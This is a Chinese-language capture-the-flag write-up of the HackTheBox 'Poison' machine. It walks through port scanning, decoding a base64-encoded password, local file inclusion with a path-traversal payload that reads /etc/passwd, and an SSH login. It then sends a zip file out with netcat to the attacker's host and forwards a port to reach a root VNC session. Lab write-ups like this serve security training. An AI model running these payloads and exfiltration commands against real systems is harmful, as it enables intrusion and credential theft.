來源:https://www.absolomb.com/2018-09-08-HackTheBox-Poison/
Poision是HackTheBox裏面非常簡單的一個CTF服務器,不過它確實包含了一些讓有趣且獨特東西。
初始
網絡枚舉
讓我們依舊使用nmap進行快速掃描。
root@kali:~# nmap -sV 10.10.10.84 Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-24 12:27 CDT Nmap scan report for 10.10.10.84 Host is up (0.052s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32) Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
在瀏覽器中查看端口80的頁面。
我們可以在Scriptname字段中依次檢查這些文件名。當我們提交listfiles.php時,頁面輸出了以下內容:
請注意URL的形式,它調用這些文件的方式可能容易受到LFI的攻擊。
我們先來看看pwdbackup.txt,因爲這個文件看起來很有趣。
root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=pwdbackup.txt This password is secure, it's encoded atleast 13 times.. what could go wrong really.. Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0 NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO Ukd4RVdub3dPVU5uUFQwSwo=
編碼了13次,好吧,讓我們快速編寫一個python腳本來快速解碼,而不是手動一次次執行解碼。
import base64
string **=**"""
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo= """
**def**** decode**(b64\_string, iterations):
i **=** 0
**while** i **\<** iterations:
b64\_string **=** base64 **.** b64decode(b64\_string) **.** decode('utf-8')
i **+=** 1
**print** (b64\_string)
decode(string, 13)測試腳本並運行:
root@kali:~/htb/poison# python3 decode.py Charix!2#4%6&8(0
OK!我們得到了密碼,但我們仍然需要知道用戶名。
讓我們測試一下是否存在LFI漏洞。
root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=../../../etc/passwd \<br /\> \<b\>Warning\</b\>: include(../../../etc/passwd): failed to open stream: No such file or directory in \<b\>/usr/local/www/apache24/data/browse.php\</b\> on line \<b\>2\</b\>\<br /\> \<br /\> \<b\>Warning\</b\>: include(): Failed opening '../../../etc/passwd' for inclusion (include\_path='.:/usr/local/www/apache24/data') in \<b\>/usr/local/www/apache24/data/browse.php\</b\> on line \<b\>2\</b\>\<br /\>
我們在這裏可以看到確實使用了include(),我們也看到了包含的路徑,所以我們需要跳五層目錄才能跳到根目錄。
root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=../../../../../etc/passwd # $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr$ # root:\*:0:0:Charlie &:/root:/bin/csh toor:\*:0:0:Bourne-again Superuser:/root: daemon:\*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:\*:2:5:System &:/:/usr/sbin/nologin bin:\*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:\*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:\*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:\*:7:13:Games pseudo-user:/:/usr/sbin/nologin news:\*:8:8:News Subsystem:/:/usr/sbin/nologin man:\*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:\*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:\*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:\*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:\*:53:53:Bind Sandbox:/:/usr/sbin/nologin unbound:\*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin proxy:\*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin \_pflogd:\*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin \_dhcp:\*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:\*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:\*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin auditdistd:\*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin www:\*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin \_ypldap:\*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin hast:\*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin nobody:\*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin \_tss:\*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin messagebus:\*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin avahi:\*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin cups:\*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin charix:\*:1001:1001:charix:/home/charix:/bin/csh
我們看到有一個charix的用戶名。
讓我們用這個用戶名和密碼試試ssh。
root@kali:~/htb/poison# ssh [email protected] Password for charix@Poison: Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4 FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017 Welcome to FreeBSD! Release Notes, Errata: https://www.FreeBSD.org/releases/ Security Advisories: https://www.FreeBSD.org/security/ FreeBSD Handbook: https://www.FreeBSD.org/handbook/ FreeBSD FAQ: https://www.FreeBSD.org/faq/ Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/ FreeBSD Forums: https://forums.FreeBSD.org/ Documents installed with the system are in the /usr/local/share/doc/freebsd/ directory, or can be installed later with: pkg install en-freebsd-doc For other languages, replace "en" with a language code like de or fr. Show the version of FreeBSD installed: freebsd-version ; uname -a Please include that output and any error messages when posting questions. Introduction to manual pages: man man FreeBSD directory layout: man hier Edit /etc/motd to change this login announcement. You can often get answers to your questions about FreeBSD by searching in the FreeBSD mailing list archives at http://www.FreeBSD.org/search/search.html charix@Poison:~ %
很好!
特權升級
查看主目錄,我們看到一個可疑的zip文件。
charix@Poison:~ % ls -al total 48 drwxr-x--- 2 charix charix 512 Mar 19 17:16 . drwxr-xr-x 3 root wheel 512 Mar 19 16:08 .. -rw-r----- 1 charix charix 1041 Mar 19 17:16 .cshrc -rw-rw---- 1 charix charix 0 Mar 19 17:17 .history -rw-r----- 1 charix charix 254 Mar 19 16:08 .login -rw-r----- 1 charix charix 163 Mar 19 16:08 .login\_conf -rw-r----- 1 charix charix 379 Mar 19 16:08 .mail\_aliases -rw-r----- 1 charix charix 336 Mar 19 16:08 .mailrc -rw-r----- 1 charix charix 802 Mar 19 16:08 .profile -rw-r----- 1 charix charix 281 Mar 19 16:08 .rhosts -rw-r----- 1 charix charix 849 Mar 19 16:08 .shrc -rw-r----- 1 root charix 166 Mar 19 16:35 secret.zip -rw-r----- 1 root charix 33 Mar 19 16:11 user.txt
讓我們用netcat將這個zip文件傳到我們的本地機器上。
charix@Poison:~ % nc -w 2 10.10.14.8 443 \< secret.zip root@kali:~/htb/poison# nc -lvnp 443 \> secret.zip listening on [any] 443 ... connect to [10.10.14.8] from (UNKNOWN) [10.10.10.84] 13787
這個zip文件受密碼保護,但我們可以嘗試使用charix用戶的ssh密碼來解壓縮。竟然可以!
root@kali:~/htb/poison# unzip secret.zip Archive: secret.zip [secret.zip] secret password: extracting: secret
檢查文件格式,我們可以看到它應該是一個常規的ASCII文件。
root@kali:~/htb/poison# file secret secret: Non-ISO extended-ASCII text, with no line terminators root@kali:~/htb/poison# cat secret [|Ֆz!
然而,文件內容是一些垃圾字符。
讓我們再仔細瞭解一下這臺服務器吧。
使用ps aux檢查運行的進程後,我們看到以下幾個有趣的內容。
root 529 0.0 0.9 23620 8996 v0- I 19:17 0:00.22 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geo root 540 0.0 0.7 67220 7060 v0- I 19:17 0:00.07 xterm -geometry 80x24+10+10 -ls -title X Desktop
我們還看到一些監聽在本地的端口。
charix@Poison:~ % netstat -an Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp4 0 0 10.10.10.84.22 10.10.14.8.44976 ESTABLISHED tcp4 0 0 127.0.0.1.25 \*.\* LISTEN tcp4 0 0 \*.80 \*.\* LISTEN tcp6 0 0 \*.80 \*.\* LISTEN tcp4 0 0 \*.22 \*.\* LISTEN tcp6 0 0 \*.22 \*.\* LISTEN tcp4 0 0 127.0.0.1.5801 \*.\* LISTEN tcp4 0 0 127.0.0.1.5901 \*.\* LISTEN udp4 0 0 \*.514 \*.\* udp6 0 0 \*.514 \*.\*
端口5801和5901通常是VNC服務使用,這與我們在進程列表中看到的正在運行的VNC會話相匹配。讓我們把端口轉發到我們的本地機器上,這樣我們就可以訪問了(確保你在本地機器上已經啓動了SSH!)。
charix@Poison:~ % ssh -l root -R 5801:127.0.0.1:5901 10.10.14.8 [email protected]'s password: The programs included with the Kali GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/\*/copyright. Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@kali:~#
如果我們檢查kali上的監聽連接,我們會看到端口轉發已經成功。
root@kali:~# netstat -ant Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:22 0.0.0.0:\* LISTEN tcp 0 0 127.0.0.1:5801 0.0.0.0:\* LISTEN tcp 0 0 10.10.14.8:44976 10.10.10.84:22 ESTABLISHED tcp 0 0 10.10.14.8:22 10.10.10.84:54672 ESTABLISHED tcp6 0 0 :::22 :::\* LISTEN tcp6 0 0 ::1:5801 :::\* LISTEN
Vncviewer 支持-passwd選項,所以我們可以將passwd文件傳遞給它來進行身份驗證,因此我們可能會傳遞我們之前拿到的那個secret文件進行身份驗證。
root@kali:~/htb/poison# vncviewer -h
TightVNC Viewer version 1.3.9
Usage: vncviewer [\<OPTIONS\>] [\<HOST\>][:\<DISPLAY#\>]
vncviewer [\<OPTIONS\>] [\<HOST\>][::\<PORT#\>]
vncviewer [\<OPTIONS\>] -listen [\<DISPLAY#\>]
vncviewer -help
\<OPTIONS\> are standard Xt options, or:
-via \<GATEWAY\>
-shared (set by default)
-noshared
-viewonly
-fullscreen
-noraiseonbeep
-passwd \<PASSWD-FILENAME\> (standard VNC authentication)
~
~
root@kali:~/htb/poison# vncviewer -passwd secret 127.0.0.1:5801
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"
沒錯,搞定了!